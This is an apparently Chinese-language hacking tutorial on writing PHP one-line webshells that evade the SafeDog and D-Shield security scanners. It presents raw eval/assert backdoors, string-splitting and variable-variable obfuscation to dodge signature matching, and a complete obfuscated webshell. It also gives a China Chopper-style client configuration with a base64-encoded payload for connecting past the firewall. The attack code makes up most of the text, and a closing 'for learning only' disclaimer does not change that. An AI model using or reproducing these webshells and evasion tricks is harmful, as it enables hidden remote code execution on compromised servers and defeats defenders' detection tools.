新手怎么编写一句话木马绕过安全狗?【已解决】

昨天我们的新手白帽渗透群有小白提问 怎么绕过安全狗?授之以鱼不如授之以渔,今天蓝域黑客网小编,教你利用特殊符号进行绕过!
一句话最原始形态:
<?php eval($_POST[4]);?>
<?php assert($_POST[4]);?>
注意:
BaiDu下一eval和assert的区别
eval可以不变量引用,而assert可以;eval可以执行多条语句,assert只能执行一句
 
在D狗扫描Web后门的时候就会匹配这两个函数
绕过方法:拆封-->组合
拆分:{}和$
组合:()和.
 
    $c='ass'.'ert';$c($_POST[4]);
 
复制代码
 
//这个是经过简单$拆分的一句话,但过不D盾
//过滤 变量+($_POST    想办法改变这个模式
 
    $c='ass'.'ert';${c}($_POST[4]);
 
复制代码
 
//这个就绕过D盾了,{}变量分离符,可以把$后面的变量名做字符串处理
 
    $_POST[4] == ${chr(95).'POS'.chr(84)}[4]
 
复制代码
 
//可以测试一下,是一样的可以接受到POST数据中4的参数
 
我的一句话:
 
    <?php
 
    $A='Acc';
 
    $p='_';
 
    $o='PO';
 
    $s='S';
 
    $t='T';
 
    $a='as';
 
    $b='sert';
 
    $Acc=$a.$b;
 
    ${$A}(${$p.$o.$s.$t}[4]);
 
说到底,只要想办法拆封组合就可以绕过,所以没必要担心软件更新
蓝域白帽
//在来说如何绕过安全狗连接一句话,如果没搞明白eval和assert的区别最好在搞明白在看
这是刚写的,过最新的狗
hatchet.ini:
 
    [Header]
 
    User-Agent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
 
    Referer=1
 
    X-Forwarded-For=1
 
    [/Header]
 
    [Headers]
 
    Accept-Language: en-us
 
    Content-Type: application/x-www-form-urlencoded
 
    [/Headers]
 
    [POST]
 
    ASP_POST_DATA==Execute("Ex"%26cHr(101)%26cHr(99)%26"ute(""On+Error+Resume+Next:
 
    PHP_POST_DATA==@${chr(95).'POS'.chr(84)}[1]($_POST['xxxx'](ZXZhbCgkX1BPU1RbJ3h4eHgnXSgkX1BPU1RbJ3h4eCddKSk7));&1=assert&xxxx=base64_decode&xxx=
 
    PHP_POST_Z0_DATA=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);
 
    [/POST]
 
这里只讲PHP的
 
 
 
    PHP_POST_DATA==@${chr(95).'POS'.chr(84)}[1]($_POST['xxxx'](ZXZhbCgkX1BPU1RbJ3h4eHgnXSgkX1BPU1RbJ3h4eCddKSk7));&1=assert&xxxx=base64_decode&xxx=
 
复制代码
 
@${chr(95).'POS'.chr(84)}[1] == $_POST[1] == assert
//这个应该还理解
蓝域白帽
$_POST['xxxx'](ZXZhbCgkX1BPU1RbJ3h4eHgnXSgkX1BPU1RbJ3h4eCddKSk7)  
//这个我不讲,大家可以解密base64编码,为什么要"重复"
菜刀的操作(读文件,写文件,数据库,命令执行)的php代码都是大于1行的,而我们一句话用的assert,只能执行一句php代码,所以必须重复再写一个代码执行eval函数
&1=assert&xxxx=base64_decode&xxx=
//这是POST的数据,不多讲。

以上就是蓝域白帽渗透网,为您带来的关于 如何编写绕过安全狗的小马,教程仅供学习
如果您喜欢本篇文章,转载请注明本文来源出处:http://www.yemogege.cn/wzaq-stwz/373.html

版权保护: 本文由admin所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stwz/373.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图